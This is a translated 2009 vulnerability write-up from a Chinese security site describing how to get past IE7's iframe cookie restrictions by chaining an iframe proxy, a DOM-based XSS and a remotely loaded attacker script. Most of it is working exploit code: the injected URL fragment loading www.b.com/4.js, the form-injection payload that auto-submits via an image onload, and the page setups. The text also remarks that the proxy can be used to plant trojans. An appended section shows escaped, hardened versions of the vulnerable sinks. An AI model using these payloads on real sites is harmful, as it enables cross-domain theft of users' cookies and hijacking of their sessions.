Breaking IE's security restriction to access the local cookie inside an iframe sub-frame - Vulnerability Warning - 黑吧安全网

2009-03-19T00:00:00
ID MYHACK58:62200922569
Type myhack58
Reporter Anonymous
Modified 2009-03-19T00:00:00

Description

Author: aullik5

This article mainly covers the following three things: 1. the restrictions on iframes; 2. the idea for breaking out of the iframe to get the local cookie; 3. using the Cross Iframe Trick to break through the iframe security restrictions. My test environment is IE 7 (7.0.5730.13). Everything below was tested by me in IE7 and is a real, working result.

Iframe restrictions: because the iframe is a rather special thing, browsers generally place some restrictions on it.

First, the parent window cannot control the child window's JS and can only read some of its objects; likewise the child window cannot use the parent window's JS and can only read some of its objects. Access to document and the like, for example, is restricted.

The relationship is as follows:
- iframes should not be able to view content/cookies from another domain
- iframe children CAN view certain properties and execute certain behaviors: parent.window.blur, parent.window.opener, parent.window.length, and others
- iframe children CAN redirect the parent frame to a new location (great for phishing): parent.location.href, parent.window.location

The parent-window JS methods a child window may use are limited. For example, in the child window you can write:

parent.location.href="http://www.sohu.com";

The statement above redirects the parent window to the sohu site.

But if you want to execute JS, or read the document object, access is denied:

parent.location.href=new String("javascript:alert(document.cookie)");
parent.location.href=new String("javascript:alert(1)");

Both of these statements are rejected.

For iframes, Firefox 3 actually does not restrict sending the local (persistent) cookie at all! That is, in Firefox, an iframe containing a remote page will send the cookies stored locally, which makes CSRF very convenient.

IE is different: in IE, img and iframe tags only send the session cookie and cannot send the local cookie, so CSRF fails much of the time, which also causes a lot of trouble for XSS, for example by making XSRF harder.

Since Firefox poses no challenge at all, today's main research target is IE.

In IE, programmers generally use the P3P protocol to obtain cross-domain cookies, but P3P requires us to rewrite HTTP headers, which is more trouble. Here I use pure scripting tricks to break through these restrictions.

Ideas for breaking the IFRAME restriction (everything below is in the IE environment): since the page that contains the iframe only sends the session cookie, the sub-frame page itself has only the session cookie; we cannot get the local cookie by executing JS inside the sub-frame, and nothing can be done from there.

Once this principle is understood, the idea is clear: open something from a new, unrestricted window, and get the local cookie that way.

Specifically, there are two ways: 1. use window.open to open a new window; 2. go back to the parent window and let it open a new window.

Inside the sub-frame, window.open() can indeed send the local cookie, but the problem is that browsers generally block pop-ups, so the window will be blocked; this method is awkward and not a good approach.

The second way, going back to the parent window to open a new window, involves the problem of executing script across the iframe boundary, and that problem was already solved in my previous article, Cross Iframe Trick, so our method is ready.

Using the Cross Iframe Trick to break through the iframe restriction and access the sub-frame's cookie:

The greatest contribution of the Cross Iframe Trick is that it can bypass the iframe restrictions mentioned earlier, obtain objects in the parent domain or in the sub-frame, and execute script.

When a page is hard to break, if it contains an iframe page that has a weakness, the result could be disastrous.

I believe people truly proficient in script attacks can see its usefulness and advantages.

The environment is as follows (www.baidu.com is bound to 127.0.0.1):

http://www.a.com/1.html is the page we are going to attack; it contains an iframe with a weakness, and the user will only browse this page.

http://www.baidu.com/3.html is a page we control; it is embedded as an iframe in 1.html. This is the iframe proxy.

http://www.a.com/4.html is a page on www.a.com that has an XSS vulnerability; ordinary users will not visit it!

http://www.b.com/4.js is a malicious script on the attacker's own server; it is loaded remotely into 4.html through the XSS attack.

Since the user will only browse www.a.com/1.html, we want to use a script attack to obtain, from www.a.com/1.html, the user's local cookie for www.baidu.com/3.html.

The code of www.a.com/1.html is as follows:
---------------------------------- I am the clever dividing line-------------------------------------------
<script>
// Function tt1: its parameter will eventually be injected via 4.html
function tt1(fvck){
    alert("tt1() and args= "+fvck);
    document.write("<input id=\"bbb\" value=\'test1"+fvck+"\' >");
}
</script>

<body>
<iframe id="tt2_3" src="http://www.baidu.com/3.html" width="300" height="300"></iframe>
</body>
---------------------------------- I am the clever dividing line-------------------------------------------

It contains an iframe page.

The code of www.baidu.com/3.html is:
---------------------------------- I am the clever dividing line-------------------------------------------
<html>
<body>

<script>
//parent.location.href=new String("javascript:alert(document.cookie)");
//parent.location.href="http://www.sohu.com";

alert("3.html in the iframe and cookie="+document.cookie);

// iframe proxy: create a dynamic iframe and use the XSS vulnerability in 4.html
var tt1_4 = document.createElement("iframe");
tt1_4.src = "http://www.A.com/4.html#' ><script src=\"http://www.b.com/4.js\"><\/script><\'";
document.body.appendChild(tt1_4);
</script>

</body>
</html>
---------------------------------- I am the clever dividing line-------------------------------------------

3.html is our iframe proxy; we use it to do the work of executing script inside www.a.com.

The code of www.a.com/4.html is:
---------------------------------- I am the clever dividing line-------------------------------------------
<html>

<script>
// A DOM-based XSS vulnerability
document.write("<input id=\"aaa\" value=\'test4"+window.location.href+"\' >");
//window.open("http://www.baidu.com/4.html"); // this would carry the cookie
</script>

<body>
This is 4.html!
<!-- Remove this comment to test: what is sent this way is still only the session cookie
<form id="form1" method="post" action="http://www.baidu.com/2.html">
<img src="http://himg.baidu.com/sys/portrait/item/26ba61756c6c696b35c504.jpg" onload=submitpost4();>
</form>
<script>function submitpost4(){ document.forms[0].submit(); }</script>
-->
</body>
</html>
---------------------------------- I am the clever dividing line-------------------------------------------

The code of www.b.com/4.js is:
---------------------------------- I am the clever dividing line-------------------------------------------
alert("4.js is loaded!");

top.tt1('\'><form id="form1" method="post" action="http://www.baidu.com/2.html"><img src="http://himg.baidu.com/sys/portrait/item/26ba61756c6c696b35c504.jpg" onload=submitpost4();></form><script>function submitpost4(){ document.forms[0].submit(); }</script><!-- ');
---------------------------------- I am the clever dividing line-------------------------------------------

4.js is where we really use the XSS vulnerability together with the Cross Iframe Trick to open a new window and so get the local cookie.

The code of www.baidu.com/2.html is very simple; its role is to show the current cookie:
---------------------------------- I am the clever dividing line-------------------------------------------
<script>
alert("2.html cookie="+document.cookie);
</script>
---------------------------------- I am the clever dividing line-------------------------------------------

The attack process is: www.a.com/1.html ----iframe----> www.baidu.com/3.html ----dynamic iframe----> www.a.com/4.html ----XSS vulnerability----> www.b.com/4.js is loaded remotely in the www.a.com domain.

4.js dynamically calls the tt1() function in www.a.com/1.html and tampers with its parameter, writing a form into the page and submitting it dynamically with JS; when the form is submitted, the local cookie is carried automatically.

The whole run goes as follows. First visit www.a.com/1.html (screenshot: http://pic.yupoo.com/sunlei/6774961f9ce8/cd1xn34u.jpg). You can see that at this point the pop-up in www.baidu.com/3.html shows only a session cookie; compare it with the local cookie shown in our final result. Next, 3.html constructs the iframe proxy.

You can see that because the XSS vulnerability in www.a.com/4.html is exploited, the remote JS is loaded.

The remote JS goes on to call top.tt1(), tampering with its parameter; the parameter is as shown in the screenshot. This parameter is then injected into tt1(); since tt1() contains a document.write, it rewrites the page and constructs a form, which is submitted to www.baidu.com/2.html.

Because the form uses the img tag's onload event, the form is submitted as soon as the image loads, so the cookie is obtained automatically right away.

You can see that in this case www.baidu.com/2.html shows the stored local cookie!

Note that in 4.html, even if top.tt1() is put into document.write(), the local cookie cannot be accessed; I think this is still because of the iframe restriction.
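As an added example (not the article's own code), the document.write() sink of 4.html and the identical one in tt1() of 1.html are shown beside hardened versions, with the article's own URL fragment and form payload as constructed inputs; the functions return the markup instead of writing it, so the difference can be checked under Node without a browser.

```javascript
// Added example (not the article's code): the document.write() sinks of 4.html
// and of tt1() in 1.html, each beside a hardened version. The functions return
// the markup instead of writing it, so this runs under Node without a browser.

// Constructed input: the URL that 3.html assigns to its dynamic iframe. The
// fragment is never sent to the server, so only client-side code can handle it.
const CONSTRUCTED_URL =
  "http://www.A.com/4.html#' ><script src=\"http://www.b.com/4.js\"></script><'";

// Constructed stand-in for the argument 4.js passes to top.tt1(); the image
// URL is a placeholder, the structure is the article's payload.
const CONSTRUCTED_TT1_ARG =
  "'><form id=\"form1\" method=\"post\" action=\"http://www.baidu.com/2.html\">" +
  "<img src=\"x.jpg\" onload=submitpost4();></form><!-- ";

// Vulnerable, as in 4.html: the raw URL is concatenated into a single-quoted
// attribute, so a quote in the fragment ends the attribute and '>' ends the tag.
function renderInputVulnerable(href) {
  return "<input id=\"aaa\" value='test4" + href + "' >";
}

// Vulnerable, as in tt1() of 1.html: the same sink with an attacker-controlled argument.
function renderTt1Vulnerable(fvck) {
  return "<input id=\"bbb\" value='test1" + fvck + "' >";
}

// Hardened: encode every character that can close an attribute or open a tag.
function escapeHtmlAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", "\"": "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderInputHardened(href) {
  return "<input id=\"aaa\" value=\"" + escapeHtmlAttr(href) + "\">";
}

function renderTt1Hardened(fvck) {
  return "<input id=\"bbb\" value=\"test1" + escapeHtmlAttr(fvck) + "\">";
}

// Review check: each template writes exactly one tag, so more than one tag
// opener ('<' followed by a letter, '/' or '!') means the value broke out.
function countTagOpeners(html) {
  return (html.match(/<[a-z\/!]/gi) || []).length;
}

function isMarkupSafe(html) {
  return countTagOpeners(html) === 1;
}
```

Building the element with document.createElement and setAttribute instead of string concatenation removes the sink entirely; the escape function is the fix when the template must stay a string.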

The above is the method of using the Cross Iframe Trick to break the iframe restriction; in terms of cross-page attacks, cross-domain attacks, breaking through iframe restrictions and so on, it greatly enriches scripting attack methods.

I don't know whether I have written this clearly; if someone takes the time to go through the POC carefully, they will find it quite interesting.

Finally, to repeat: some people may ask, since an iframe proxy can be constructed, can it be used directly to plant a Trojan (挂马)?

Yes, of course it can be used directly to plant a Trojan, but that is a more complex attack: it requires a good browser vulnerability, a good Trojan, and shellcode able to defeat active-defense products; at the same time, depending on the data that needs to be obtained, sometimes planting a Trojan cannot achieve the goal either. For example, if the target of the attack is data on the site, and the site has SSL protection or anti-keylogger programs, it will be more trouble.